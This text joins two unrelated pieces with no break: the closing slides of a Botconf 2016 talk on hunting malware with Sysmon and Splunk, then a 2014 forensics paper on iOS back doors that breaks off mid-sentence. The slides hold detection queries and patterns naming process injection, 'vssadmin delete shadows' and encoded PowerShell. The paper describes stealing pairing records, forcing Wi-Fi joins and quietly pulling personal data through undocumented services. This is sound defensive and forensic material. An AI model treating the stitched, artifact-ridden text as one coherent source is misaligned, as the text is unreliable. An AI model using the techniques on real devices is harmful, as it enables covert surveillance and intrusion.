Search for rarest  source  or target  images  from  proc  injection  
 \\127.0.0.1 \ADMIN$\8c0cb58.exe  
# C:\Windows\system32 \rundll32.exe  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 105 Keylogger  (proc  injection ) 
CS_Keylogger_injection  
 
10/26/2016 11:56:32 PM  
LogName=Microsoft -Windows-Sysmon/Operational  
SourceName =Microsoft -Windows-Sysmon 
EventCode =8 
EventType =4 
Type=Information  
... 
Message= CreateRemoteThread  detected : 
SourceProcessId : 17728 
SourceImage : C:\Windows\SysWOW64 \rundll32.exe  
TargetProcessId : 836 
TargetImage : C:\Windows\System32 \winlogon.exe  
NewThreadId : 14236 
StartAddress : 0x0000000000C20000  
StartFunction : 
 
Suspicious  proc  injection  into  «winlogon.exe » 
Steal  user’s  password  while  logging  on or unlocking  screensaver  
 C:\Windows\SysWOW64 \rundll32.exe  
# C:\Windows\system32 \winlogon.exe  
 
 
Find processes  connecting  thru  proxy  or directly  to the Internet  
–Count distinct  hashes  and Import Hashes  
–Count distinct  clients  
–Count distinct  image  paths  and names  
Search for PowerShell   -EncodedCommand  
 
 
  Seite 106 More ideas  for Hunting  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 107 Processes  connecting  thru  Proxy  
 
index=sysmon SourceName ="Microsoft -Windows-Sysmon" EventCode =1 
  [  
    search index=sysmon SourceName ="Microsoft -Windows-Sysmon"  
        EventCode =3 Image="* \\Users\\*"  
        DestinationHostname ="proxy.fqdn " 
    | stats by ComputerName  ProcessGuid   
    | fields ComputerName  ProcessGuid   
  ] 
| fields Hashes ComputerName  Image ParentImage  
| rex field=Hashes ".*MD5=(?<MD5>[A -F0-9]*),IMPHASH=(?<IMPHASH>[A -F0-9]*)" 
| rex field=Image ".* \\\\Users\\\\(?<username >[^\\\\]+)\\\\.*"  
| rex field=Image ".*\\\\+(?<proc_name >[^\\\\]+\.[eE][xX][eE]).*"  
| rex field=ParentImage  ".*\\\\+(?<pproc_name >[^\\\\]+\.[eE][xX][eE]).*"  
| stats dc(ComputerName ) AS CLIENTS, dc(MD5) AS CNT_MD5,  
    dc(Image ) AS CNT_IMAGE, values(username ) AS Users, 
    values(ComputerName ) AS Computers, values(MD5) AS MD5, 
    values(proc_name ) AS proc_name , values(pproc_name ) AS pproc_name  
    by IMPHASH 
| where CLIENTS < 15 
| sort –CLIENTS 
 
IMPHASH = Import Hash  
 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 108 Processes  connecting  thru  Proxy  
 
index=sysmon SourceName ="Microsoft -Windows-Sysmon" EventCode =1 
  [  
    search index=sysmon SourceName ="Microsoft -Windows-Sysmon"  
        EventCode =3 Image="* \\Users\\*"  
        DestinationHostname ="proxy.fqdn " 
    | stats by ComputerName  ProcessGuid   
    | fields ComputerName  ProcessGuid   
  ] 
| fields Hashes ComputerName  Image ParentImage  
| rex field=Hashes ".*MD5=(?<MD5>[A -F0-9]*),IMPHASH=(?<IMPHASH>[A -F0-9]*)" 
| rex field=Image ".* \\\\Users\\\\(?<username >[^\\\\]+)\\\\.*"  
| rex field=Image ".*\\\\+(?<proc_name >[^\\\\]+\.[eE][xX][eE]).*"  
| rex field=ParentImage  ".*\\\\+(?<pproc_name >[^\\\\]+\.[eE][xX][eE]).*"  
| stats dc(ComputerName ) AS CLIENTS dc(MD5) AS CNT_MD5  
    dc(Image ) AS CNT_IMAGE values(username ) AS Users  
    values(ComputerName ) AS Computers values(MD5) AS MD5  
    values(proc_name ) AS proc_name  values(pproc_name ) AS pproc_name  
    by IMPHASH 
| where CLIENTS < 15 
| sort –CLIENTS 
 
IMPHASH = Import Hash  
 

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 109 Powershell  -EncodedCommand  
 
 
alert_sysmon_powershell_encodedcommand  
 
index=sysmon SourceName ="Microsoft -Windows-Sysmon" EventCode ="1"  
    powershell.exe  
| eval CommandLine  = replace(CommandLine , "-encoding ", "") 
| search  
    Image="*\\powershell.exe " 
    CommandLine ="* -enc*" 
 
matches  Powershell  parameter  
« -enc» or « -EncodedCommand » or ... (many  variations  possible ) 
but not « -encoding » 
 
may  need  (lots of) tuning  / filtering  for alerting  
or useful  for hunting  
 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 110 Conclusion  (1/2)  
 
Using  the free  Sysmon  tool  you can search  / alert for  
known  malicious  process  behaviors  
 
Image names  / paths  (wrong  paths ) 
svchost.exe, %APPDATA% \Oracle \bin\javaw.exe  
CommandLine  parameters  
/stext , vssadmin  delete  shadows , rundll32  qwerty  
Parent - / Child -Process  relationships  
winword.exe  explorer.exe, wscript.exe  rundll32.exe  
Process  injection  
# winlogon.exe  
 
 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 111 Conclusion  (2/2)  
 
Using  the free  Sysmon  tool  you can hunt  for  
suspicious  process  behaviors  
 
Lateral movement  using  admin  shares  
ADMIN$, C$, IPC$  (\\127.0.0.1 \...) 
Internal C&C P2P comms  over  named  pipes  / SMB  
processes  using  port  445 between  workstations  
Rarest  processes  connecting  thru  proxy  (or directly  to Internet)  
count  by hashes , IMPHASHes , clients , image  names  
Suspicious  Powershell  activity  
Powershell  -EncodedCommand  | -enc ... 
 
Countless  more  ideas , but out of time...  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 112 Thanks  goes  to... 
 
(in random  order ) 
Mark Russinovich  & Thomas Garnier for Sysmon  & RSA talk etc.  
Raphael Mudge  for Cobalt  Strike , videos , blogs  etc.  
David Bianco for ThreatHuntingProject , Pyramid  of Pain , blog  etc.  
SANS DFIR folks  for «Find Evil» poster  and all DFIR resources  
Joe Security for its great  sandbox  product  
Veris  ATD team  for Empire, BloodHound  etc. & ARTT BH training  
 
... and everyone  contributing  to the DFIR or ITsec  community  
 
Thank  you for your  attention ! 
Questions ? 
(if there  is time left) 
  
Tom Ueltschi, Swiss Post CERT  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 113 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 114 References (1/2)  
07 https:// technet.microsoft.com/en -us/sysinternals/sysmon   
10 "Bro Overview for Advanced IR.mp4"  
12 http:// detect -respond.blogspot.ch/2013/03/the -pyramid -of-pain.html   
13 https://digital -forensics.sans.org/blog/2009/10/14/security -intelligence -attacking -the-kill-chain /  
14 http:// detect -respond.blogspot.ch/2013/03/what -do-you-get-when -you-cross -pyramid.html   
16 https:// www.rsaconference.com/writable/presentations/file_upload/hta -w05 -
tracking_hackers_on_your_network_with_sysinternals_sysmon.pdf   
22 https:// twitter.com/c_APT_ure/status/725021744558444546   
23 https:// twitter.com/markrussinovich/status/725022565211631620   
27 https:// digital -forensics.sans.org/media/poster_2014_find_evil.pdf   
32 https://heimdalsecurity.com/blog/security -alert -adwind -rat-targeted -attacks -zero -av-detection /  
36 https:// www.hybrid -
analysis.com/sample/7aa15bd505a240a8bf62735a5389a530322945eec6ce9d7b6ad299ca33b2
b1b0?environmentId=100   
41 https://isc.sans.edu/forums/diary/Hancitor+Maldoc+Bypasses+Application+Whitelisting/21683/  
42 https://blog.didierstevens.com/2016/11/02/maldoc -with -process -hollowing -shellcode /  
 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 115 References (2/2)  
53 https:// www.hybrid -
analysis.com/sample/1e9d0514ed7770203335e8a95dcd21b982e8cc3f47ca19b59403dd5c3bbf
da8c?environmentId=100   
55 https:// www.hybrid -
analysis.com/sample/a55a2c04e8cc2e4895c3e0532e673dc470556b7808df468291e85f4f87cb
e565?environmentId=100   
58 https:// books.google.ch/books?isbn=1597495549   
79 https:// twitter.com/c_APT_ure/status/783062646685888514   
82 http:// blog.sqrrl.com/threat -hunter -profile -bianco   
84 http://www.threathunting.net /  
85 http:// www.threathunting.net/goal -index   
91 https://www.cobaltstrike.com /  
92 https:// www.cobaltstrike.com/training   
95 https:// www.cobaltstrike.com/help -beacon   
97 https:// www.cobaltstrike.com/downloads/csmanual351.pdf   
108 https:// www.fireeye.com/blog/threat -research/2014/01/tracking -malware -import -hashing.html   
 Identifying back doors, attack points, and surveillance
mechanisms in iOS devices
Jonathan Zdziarski
article info
Article history:
Received 10 December 2013Received in revised form 23 January 2014Accepted 26 January 2014
Keywords:
ForensicsExploitationiOSBack doors
Security
MalwareSpywareSurveillanceabstract
The iOS operating system has long been a subject of interest among the forensics and law
enforcement communities. With a large base of interest among consumers, it has becomethe target of many hackers and criminals alike, with many celebrity thefts (For example,the recent article “How did Scarlett Johansson ’s phone get hacked? ”) of data raising
awareness to personal privacy. Recent revelations (Privacy scandal: NSA can spy on smartphone data, 2013; How the NSA spies on smartphones including the BlackBerry ) exposed
the use (or abuse) of operating system features in the surveillance of targeted individuals
by the National Security Agency (NSA), of whom some subjects appear to be American
citizens. This paper identi fies the most probable techniques that were used, based on the
descriptions provided by the media, and today ’s possible techniques that could be
exploited in the future, based on what may be back doors, bypass switches, generalweaknesses, or surveillance mechanisms intended for enterprise use in current releaseversions of iOS. More importantly, I will identify several services and mechanisms that canbe abused by a government agency or malicious party to extract intelligence on a subject,
including services that may in fact be back doors introduced by the manufacturer. A
number of techniques will also be examined in order to harden the operating systemagainst attempted espionage, including counter-forensics techniques.
a2014 Elsevier Ltd. All rights reserved.
Introduction
German news outlet Der Spiegel ran an article ( Privacy
scandal: NSA can spy on smart phone data, 2013 )i n
September 2013 citing leaked NSA documents that boasted
of the agency ’s capabilities in hacking iPhones as early on
as 2009. As the article describes it, the NSA allegedly hacksinto the desktop machine of their subjects and then runs
additional “scripts ”that allow them to access a number of
additional “features ”running on the subjects ’iPhones.
From the article:
“The documents state that it is possible for the NSA to tap
most sensitive data held on these smart phones, includingcontact lists, SMS traf fic, notes and location information
about where a user has been. .In the internal documents,
experts boast about successful access to iPhone data in
instances where the NSA is able to in filtrate the computer a
person uses to sync their iPhone. Mini-programs, so-called"scripts," then enable additional access to at least 38
iPhone features .”
Another article ( How the NSA spies on smartphones
including the BlackBerry ) from Der Spiegel goes into
greater detail, providing examples of instances where a
user’ s photo album and backup data were accessed. Of
course, some of this data could have easily been extractedfrom other possible NSA activities, such as iCloud inter-
ception ( How the NSA cracked the web ), SMS interception
(iPhone users are all zombies ), or copied from a desktop
backup on a compromised computer ( Zdziarski; How the
E-mail address: jonathan@zdziarski.com .
Contents lists available at ScienceDirect
Digital Investigation
journal homepage: www.elsevier.com/locate/diin
http://dx.doi.org/10.1016/j.diin.2014.01.001
1742-2876/a 2014 Elsevier Ltd. All rights reserved.Digital Investigation 11 (2014) 3 –19

NSA spies on smartphones including the BlackBerry ), but
given the nature of the article, I ’ll assume that in at least
some circumstances, the NSA appears to claim the capa-
bility to access data on the device directly. The scope of this
document will be limited only to harvesting data at rest on
the device.
While the actual methods could only be con firmed by
the agency itself, the simplest, and most technically feasible
explanation, based on the techniques described and the
data purportedly stolen, is that the NSA has exploited the
trusted relationship between a user ’s desktop machine and
a connected iOS device, used that trusted relationship to
then start up a number of otherwise protected, yet un-
documented data services running on the device, which
will be explored later in this paper. This technique provides
not only the ability to transfer a signi ficant amount of data
from an iPhone (possibly copying to some remote
command-and-control server), but would also allow an
agency such as NSA to bypass certain aspects of file system
encryption, backup encryption, and also (if they chose)
perform a number of other capabilities, including the
following.
/C15Download large amounts of decrypted personal
information
/C15Install spyware on the mobile device itself
/C15Sniff the network traf fic going through the device
/C15Install mobile APN pro files to redirect Internet traf fict o
a proxy server
/C15Generate additional pairing records for exclusive use
/C15Access the content of any application ’s sandbox
/C15Perform these and other tasks without the user ’s
knowledge
While Der Spiegel made no written mention of WiFi, the
technical possibility exists that NSA (or any other malicious
attacker) could also do much of this wirelessly, while the
phone is sitting in the targeted subject ’s pocket, or even
while they use the device, without any visual indicators.
This paper will identify some of the services and poorly
protected mechanisms that can be abused to accomplish all
of this, and provide some solutions to disable them, with
very little notice to the average end-user.
My own experience in researching iOS has led me to
believe that Der Spiegel ’s article is not far off from the same
approach I am describing, as recent versions of iOS
(including iOS 6 and 7) have seen a lot of new activity in the
development of undocumented services to copy very spe-
cific personal data items, explained further in this
document.
While the consumer has seen new security mechanisms
introduced over time, such as backup encryption, new
workarounds have also seemingly been added by Apple to
work around them (such as adding more undocumented
data sources that bypass encryption, explained in Section
3.7). Similar security enhancements have been made to
improve the security of iOS 7, such as a con firmation dialog
to trust new desktop connections. Unfortunately, this
doesn ’t help when dealing with a compromised desktop
that has already established a trusted relationship. Tofurther threaten the effectiveness of this new feature, Ap-
ple’s new over-the-air (OTA) supervision and automatic
enrollment for iOS 7 ’s MDM ( iOS 7 and business ) makes it
much easier for an agency that specializes in hacking to
turn a one-time opportunity to connect to a device into
long-term surveillance, using new undocumented security
bypasses. One such bypass added to iOS 7 (presumably
added for enrolled enterprise devices) provides an override
for passcode and fingerprint authentication. Such
enterprise-grade data assurance features are an easy target
for skilled individuals with trusted access to a device. While
the hacks of the past have found ways to brute force PIN
codes and unravel encryption, new features like this appear
to be added to intentionally bypass a number of security
features under the right circumstances. The problem,
however, is that such privileged mechanics can be taken
advantage of in the wrong circumstances when dealing
with an adversary within government.
Pairing: the keys to everything
In order to understand how an attacker could penetrate
an iPhone from the owner ’s desktop computer, it ’s impor-
tant to understand how pairing works ( A cross-platform
software library and tools to communicate with iOS de-
vices natively ); A pairing is a trusted relationship with
another device, where the client device is granted privi-
leged, trusted access. In order to have the level of control to
download personal data, install applications, or perform
other such tasks on an iOS device, the machine it ’s con-
nected to must be paired with the device. This is donethrough a very simple protocol, where the desktop and the
phone create and exchange a set of keys and certi ficates.
These keys are later used to authenticate and establish an
encrypted SSL channel to communicate with the device.
Without the correct keys, the attempted SSL handshake
fails, preventing the client from obtaining privileged access.
A copy of the keys and certi ficates are stored in a single
file, both on the desktop machine and on the paired mobile
device. The pairing file is never deleted from the device
except when the user performs a restore or uses Apple ’s
“Erase All Content and Settings ”feature. In other words,
every desktop that a phone has been plugged into (espe-
cially prior to iOS 7) is given a skeleton key to the phone.
This pairing record allows either the desktop, or any client
who has copied the file, to connect to the subject ’s mobile
device and perform a number of privileged tasks that can
access personal data, install software, analyze network
content, and so on. This one pairing file identi fies someone
as the owner of the phone, and with this file gives anyone
trust and access as the device ’s owner. There are a few
frightening things to know about the pairing mechanism in
iOS.
/C15Pairing happens automatically, without any user inter-
action (up until iOS 7), and only takes a few seconds.
Pairing can be performed by anything on the other end
of the USB cable. The mobile device must either have no
passcode, or be unlocked. If the user has “RequireJ. Zdziarski / Digital Investigation 11 (2014) 3 –19 4
Passcode ”set to anything other than “Immediate ”, then
it is also possible to pair with the device after it is turned
off, until the lock timer expires. So if the user has a de-
vice unlocked to play music, and connect it to an alarm
clock or a charger running malicious code, whatever it ’s
connected to can establish a pairing record that can later
on be used to gain access to the device, at any point in
time, until the device is restored or wiped.
/C15While the pairing process itself must take place over
USB ( Renard ), at any time after that, the phone can be
accessed over either USB or WiFi regardless of whether
or not WiFi sync is turned on. This means that anattacker only needs a couple of seconds to pair with a
device, and can then later on access the device to
download personal data, or wreak other havoc, if they
can reach it across a network. Additionally, an attacker
can easily find the target device on a WiFi network by
scanning TCP:62078 and attempting to authenticate
with this pairing record. As the pair validation process is
very quick, sweeping a LAN ’s address space for the
correct iOS device generally only takes a short amount
of time.
/C15Because of the way WiFi works on these devices, an
attacker can take advantage of the device ’s“known
wireless networks ”toforce a phone to join their network
when within range, so that they can attack the phone
wirelessly. This is due to iOS ’behavior of automatically
joining networks whose name (not MAC address) it
recognizes, such as “linksys ”or“attwi fi”. It may even be
possible for a government agency with privileged access
to a cellular carrier ’s network to connect to the device
over cellular (although I cannot verify this, due to the
carrier ’sfirewalls).
Essentially, that tiny little pairing record file is the key to
downloading, installing, and even manipulating data and
applications on the target device. That is why I have advised
law enforcement agencies to begin seizing desktop ma-
chines, so that they can grab a copy of this pairing record in
order to unlock the phone; a number of forensic imagingproducts (including some I ’ve written), and even open
source tools ( A cross-platform software library and tools to
communicate with iOS devices natively ) are capable of
acquiring data from a locked mobile device, so long as the
desktop ’s pairing record has been recovered. The pairing
record also contains an escrow keybag, so that it can unlock
data that is protected by data-protection encryption
(Renard ). This is good news for the “good ”cops, who do
crazy things like get warrants; it
’s very bad for anyone who
is targeted by spy agencies or malicious hackers looking to
snoop on their data.
High value services running under iOS
When a user ’s desktop computer establishes a connec-
tion to an iOS device, it talks to a service named lockdownd .
This runs on port 62078 ( Renard; Usbmuxd ), and can
accept connections across either USB (via Apple ’s usbmux
(Usbmux ) protocol), or WiFi via TCP. The lockdownd pro-
cess acts much like an authenticated version of inetd , wherethe client requests services, which are farmed out to a
number of daemons started on the device.
When a client has connected to the iOS device on this
port, lockdown forces the client to authenticate by using a
host identi fier and keys from the pairing record file we ’ve
just discussed, issuing a StartSession request. On a Mac
running OS X, pairing records are often stored in /var/db/
lockdown orw/Library/Lockdown . On Windows 7, They ’re in
C:\Program Data\Apple\iTunes\Lockdown . Other operating
system variants will vary. Once the desktop authenticates,
the keys in the file are used to establish an SSL session with
the device ( A cross-platform software library and tools to
communicate with iOS devices natively; 25C3: hacking the
iPhone, 2008 ); the desktop machine is then able to requests
any number of services to be started on the phone, using a
StartService request, identifying the name of the service to
be started ( A cross-platform software library and tools to
communicate with iOS devices natively; 25C3: hacking the
iPhone, 2008 ).
Available services, or as the Der Spiegel article ( Privacy
scandal: NSA can spy on smart phone data, 2013 ) calls,
“features ”, include everything from basic backup and sync
services, to more suspicious services that shouldn ’t ever be
running on a mobile device, but come preinstalled by Ap-
ple’s factory firmware.
Afile on the device named Services.plist provides a
catalog of services that can be started by lockdownd ( Miller
et al. ); users who have installed a jailbreak onto their
phones can access this file in /System/Library/Lockdown/
Services.plist or it can be copied by decrypting the file sys-
tem disk of an Apple firmware bundle ( xpwntool ). Addi-
tionally, when a device is enabled for developer mode, a
number of other services are added to the /Developer folder
on the device, to allow Xcode to perform tasks such as
debugging. The standard catalog of services includes
(among others) the following.
It is important to note that the services to follow are
available on every iOS device, regardless of whether or not
the phone is enabled for development.
com.apple.mobilebackup2 ( Renard; A cross-platform software
library and tools to communicate with iOS devices natively;
Bédrune and Sigwald )
Used by iTunes to create a backup of the user data on the
device. This is the most popular service to be cloned by
forensics software, as it obtains a majority of user data-
bases, such as address book, SMS, call history, and so on.
This is the only service that is affected by turning on iTunes ’
Backup Encryption feature. When backup encryption is on,
these files are encrypted, requiring knowledge of the user
password in order to decipher. Devices without backup
encryption stand to leak a signi ficant amount of informa-
tion from this service. If a user ’s desktop is compromised, it
is conceivable that a key logger could potentially log thebackup password, also putting their encrypted backups at
risk. The encryption scheme is publicly documented, and
source code to decrypt a backup can be found at Bédrune
and Sigwald .
Even though a user may not maintain a local backup on
their desktop machine, this backup service can beJ. Zdziarski / Digital Investigation 11 (2014) 3 –19 5
connected to with a trusted connection to generate a
backup on-the- fly. Earlier versions of this service caused
the device to present a modal status screen to the user,
however newer versions of iOS merely only display a small
sync indicator in the task bar.
com.apple.mobilesync ( Renard; A cross-platform software
library and tools to communicate with iOS devices natively )
Also used by iTunes to transfer address book, Safari
bookmarks, notes, and other information that the user has
selected to sync with their desktop machine. This service is
not affected by backup encryption, and so clear text copies
of personal data will come across this service. Only data
that is speci fically designated to sync will be transferred by
this service.
Earlier versions of this service caused the device to
present a modal status screen to the user, however newer
versions of iOS merely only display a small sync indicator in
the task bar. This service, and the backup service just
described, are the only two services that present a visual
indicator of any kind to the user when the service is being
accessed.
com.apple.afc ( Renard; A cross-platform software library and
tools to communicate with iOS devices natively )
This service is often used to access the user ’s camera
reel, photo album, music, and other content stored in the /
var/mobile/Media folder on the device. By communicating
with this service, any trusted device can download the
entire media folder. Users who have installed a jailbreak
on their iOS devices may also notice a com.apple.afc2
service installed by the jailbreak tool ( The iPhone wiki ),
which allows a trusted desktop machine to access and
download the entire file system . This service presents no
visual indication to the user that the device is being
accessed.
com.apple.mobile.installation_proxy ( Renard; Evasi0n
jailbreak; A cross-platform software library and tools to
communicate with iOS devices natively )
This service is invoked whenever iTunes installs an
application on a mobile device. With knowledge of how to
speak this protocol, malicious software can also use this
service to install software on the device. While all software
has to be signed by Apple in order to successfully install,
any entity with an enterprise developer license can sign
code and install it through this service ad-hoc, without
distributing it through the App Store, and without regis-
tering the device with the Apple Developer Connection.
This service presents no visual indication to the user that
the device is being accessed.
com.apple.mobile.house_arrest ( Renard; A cross-platform
software library and tools to communicate with iOS devicesnatively )
This service can be used to access the contents of any
App Store application ’s sandbox (where user databases,screenshots, and other content for each application is
stored). By iterating through the list of installed applica-
tions on the device, it is possible to download user data-
bases, suspend screenshots, and other personal
information from every third party app on the device. It is
also possible to upload content into the application ’s
sandbox, allowing someone to inject data. This service
presents no visual indication to the user that the device is
being accessed.
While this service is used by iTunes to copy documents
in and out of applications, the service itself allows access to
persistent application data (that is, databases, caches,
screenshots, and the like), allowing forensic tools to recover
persistent data that is not normally included in a device
backup.
com.apple.pcapd ( Hacking iOS applications )
Connecting to this service immediately starts a packet
sniffer on the device, allowing the client to dump the
network traf fic and HTTP header data traveling into and
out of the device. While a packet sniffer can, on rare
occasion, be helpful to a developer writing network-
based applications, this packet sniffer is installed bydefault on all devices and notonly for devices that have
been enabled for development. This means anyone with a
pairing record can connect to a target device via USB or
W i F ia n dl i s t e ni no nt h et a r g e t ’s network traf fic. It re-
mains a mystery why Apple decided that every single
recent device needed to come with a packet sniffer. This
service presents no visual indication to the user that the
device is being accessed.
com.apple.mobile. file_relay ( Renard; Evasi0n jailbreak; A
cross-platform software library and tools to communicate
with iOS devices natively )
Thefile relay is among the biggest forensic trove of in-
telligence on a device ’s owner and, in my best and most
honest opinion, a key “backdoor ”service that, when used to
its full capability, provides a signi ficant amount of that that
would only be relevant to law enforcement or spying
agencies.
Apple seemingly has been making many changes over
the past few years to enable the extraction of information
through the undocumented file relay service that really
only has relevance to purposes of spying and/or law
enforcement. This can be seen by comparing the object
code from different operating system versions over time,
using a disassembler or other similar tools. For example,
early versions of iOS provided a very limited number of
data sources, serving primarily diagnostic mechanisms to
transfer log files and limited personal data. Newer versions
of iOS, however, include a number of additional data
sources that more deeply expose private information,including metadata that would be considered useless, even
for diagnostic purposes. The services by which this data is
transferred have not shown to be used by any legitimate
sync or diagnostic applications manufactured by Apple, and
in many cases even bypass Apple ’s own user backup
encryption feature.J. Zdziarski / Digital Investigation 11 (2014) 3 –19 6
To illustrate, the following list of six data sources shows
the only sources available from iPhoneOS firmware version
2.0.0 (5A347). While iPhoneOS 2 only provided six un-
documented data sources, there are 44 known data sources
available as of iOS 7 (explained in more detail in Section
3.7).
Data Sources available as of iPhoneOS version 2.0.0
Among some newer sources of data are a mechanism
to download an entire metadata disk image of the device
(a disk image of the entire file system, including time-
stamps, file names, file sizes, and more, but without the
actual file content), served up through a data source
named HFSMeta , the retrieval of cached GPS positioning
data through a special data source to transfer the loca-
tiond cache, the user ’s calendar, a dump of the typing
cache, device pairing records, all third party application
data, and plenty of other data that should simply not be
allowed to come off the device without knowledge of
the user ’sb a c k u pp a s s w o r d .W h i l en oo n ew o u l da r g u e
that a user (or an Apple Store) may opt to backup basic
information on a device, one must ask why an undocu-
mented service exists to copy the same (and much more)
data than the backup conduit already does, but
bypasses the manufacturer ’s own user encryption secu-
rity mechanism.
The file relay service ’s job is to accept a list of
requested data sources, and deliver a gzippedcpio archive
of the data requested. Source code to talk to the file relay
service has been available since 2009 in the libimobile-
device project ( A cross-platform software library and
tools to communicate with iOS devices natively ), how-
ever the service has been available since the very first
versions of iPhoneOS. No known public software (Xcode,
iTunes, Apple Con figurator, or others) appear to refer-
ence or use the file relay service, and as the data source
list grows, it becomes more evident that this service is
used to dump large amounts of decrypted personal
data (and metadata) from the device, far beyond any
diagnostic use (such as an Apple Store), and with capa-
bilities beyond the needs of backup or even software
development.
This service completely bypasses Apple ’s built-in
backup encryption, and using the escrow key from a pair-ing record, information that is normally encrypted is also
delivered in clear text. While Apple may have, at some
point, tapped a handful of these data sources for di-
agnostics or other purposes, it appears clear that a majority
of this data is far too personal to ever be used by Apple, orfor anything other than intelligence and law enforcement
applications.
To substantiate this notion, a number of applications
from Apple, including iTunes, Xcode, Apple Con figurator,
Apple Con figuration Management Utility, and others,
were examined for any traces of the file relay service,
and none were found. While one could conceivably
attempt to make an argument that such a service could
be used for in-store diagnostics, much of the data yiel-
ded by file relay is irrelevant to such a use, such as the
HFSMeta data source, or even services to acquire the
user ’
s entire desktop photo album. Additionally, the data
is transferred in a raw form that cannot be restored back
onto a replacement device, such as how a device backup
could, making it useless for in-store device repair or
replacement. Lastly, the file relay bypasses user backup
encryption –a security mechanism provided by Apple
to protect this same data. It would seem grossly inap-
propriate for an Apple Store to perform work on a device
to which the user had not given them a backup
password for, as is required for work on desktop ma-
chines, or to even be granted private access to a user ’s
personal data without the customer ’sd i r e c tc o n s e n t ,a n d
with their belief that their data was protected by a
password.
Data sources that can be requested from file relay
follow.
Accounts
A list of accounts con figured on the device. This is
typically email accounts, although other types of accounts
could also exist. Account passwords are not included in this
data, but only the account identi fiers.
AddressBook
An unencrypted copy of the user ’s address book and
address book photos. These SQLite databases could poten-
tially include deleted records that can be recovered with
SQLite forensics tools.
Caches
The user ’sCaches folder, located in /private/var/mobile/
Library/Caches. This folder contains screenshots taken
whenever preloaded applications are suspended,
revealing the last thing a user was looking at in each
application. They also contain a number of shared images
and of fline web content caches, contents of the last copy
or cut to the clipboard (pasteboard), map tile images,
keyboard typing cache, and other records of personal
activity.
CoreLocation
GPS positioning logs. This is a cache of the device ’sG P S
locations, taken at frequent intervals both by cellular and
WiFi. In iOS 6, the fileslockCache_encryptedA.db and
cache_encryptedA.db (neither of which are actually
encrypted) appear to be similar to older iOS 4 con-
solidated.db files that caused quite an uproar in the com-
munity a few years ago for caching so much data. SomeAppleSupport
NetworkWiFiUserDatabasesCrashReporterSystemConfigurationJ. Zdziarski / Digital Investigation 11 (2014) 3 –19 7
documents appear to indicate the NSA exploited ( NSA
spies reportedly exploited iPhone location bug ) these.
Examining the cache of a personal device running iOS 6,
there are over 500 cellular entries with some entries
containing locations that haven ’t been visited in months,
and over 3000 WiFi location entries containing SSIDs of
neighboring access points including neighbors and nearby
businesses. This cache is used to help return a GPS position
based on WiFi, however the cache does still appear to hold
some historical information, rather than the seven days
advertised.
An agency capable of forcing manufacturers to add back
doors certainly also has the power to harvest this infor-
mation every seven days from the device, or possibly from
the manufacturer, so the time period for which this data
recycles is irrelevant.
EmbeddedSocial
Logfiles stored in /var/mobile/Library/Logs/Social .I ti s
assumed that this contains logs related to iOS ’embedded
social networking, such as Facebook and Twitter. No
further information is available yet, as this is a new service
to iOS 7.
GameKitLogs
Game Kit logs including existing games, enrollments,
account information, and other GameKit related data and
logfiles.
HFSMeta
A metadata disk image of the entire file system of the
device. That is, a disk image with everything except the
actual device content. Timestamps, file names, file sizes,
creation dates, and other metadata are all stored in
this image. This is a new data source added with iOS 7. The
image is transmitted as a sparseimage format file, which can
be mounted on a Mac by simply double clicking it.
Keyboard
Contents of the key cache; also referred to as the key
logger cache . These dictionaries contain both an ordered
list of the most recent things the user has typed into the
keyboard in any application, and a complete dictionary
and word count of all words that have been typed.
Regardless of whether the input was for SMS, Mail, an
App Store application, or any other application, the
contents of typed correspondence (including that typed
into otherwise secure applications) is copied into this
cache in the order in which it was typed ( Zdziarski and
Media ).
Lockdown
A copy of all pairing records (and their escrow bag)
stored on the device. This can be used to determine how
many and which computers a device has been synced or
paired with. The dump also contains a copy of the data
ark (a large registry of device information and generaloperating parameters) and activation record. This data
can be used to determine when the device was last acti-
vated (evidence of a wipe, or restore), and determine
other device settings such as development state, backup
encryption, original setup time, device name, time zone,
the hostname and OS of the last desktop to backup the
device, and other settings. Additionally, if a pairing is
permitted while the device is locked, escrow keybags can
be recovered from this service to potentially unlock data-
protect enabled items from other data sources and
services.
MobileCal
A complete database dump of the user ’s calendar and
alarms, as well as log files and preferences. These files are in
SQLite database format, allowing deleted entries to
possibly be recovered with SQLite forensics software.
MobileNotes
A copy of the user ’s notes database, where everything is
stored in the Notes application, and the user ’s note pref-
erences. These files are in SQLite database format, allowing
deleted entries to possibly be recovered with SQLite fo-
rensics software.
Photos
A copy of the user ’s entire photo album stored on the
device.
SystemCon figuration
Contains a WiFi access point cache, containing time-
stamps and SSIDs of known networks and the last time
they were joined. Also contains information about con fig-
ured accounts network interfaces, and other con figuration
information. This can, among other things, be used to place
the device on a given WiFi network at a given time. If future
iOS devices support fingerprint scanning, it could place an
individual at the scene of a crime, and not just their mobile
device.
Ubiquity
Contains diagnostics information about iCloud,
including information about peers that data is shared with.
There is also a chunk store database, which may contain
sensitive cached data. Con flicts created during iCloud syncs
appear to be logged as well, potentially leaking metadata
about the user ’s iCloud content.
UserDatabases
A copy of the following user databases on the device:
address book, calendar, call history, SMS database, and
email metadata (envelope index). These files are in SQLite
database format, allowing deleted entries to possibly be
recovered with SQLite forensics software.
VARFS
A virtual file system metadata dump in statvfs format;
this will likely be phased out in the future, given the new
HFSMeta data source. The structure for this appears to be as
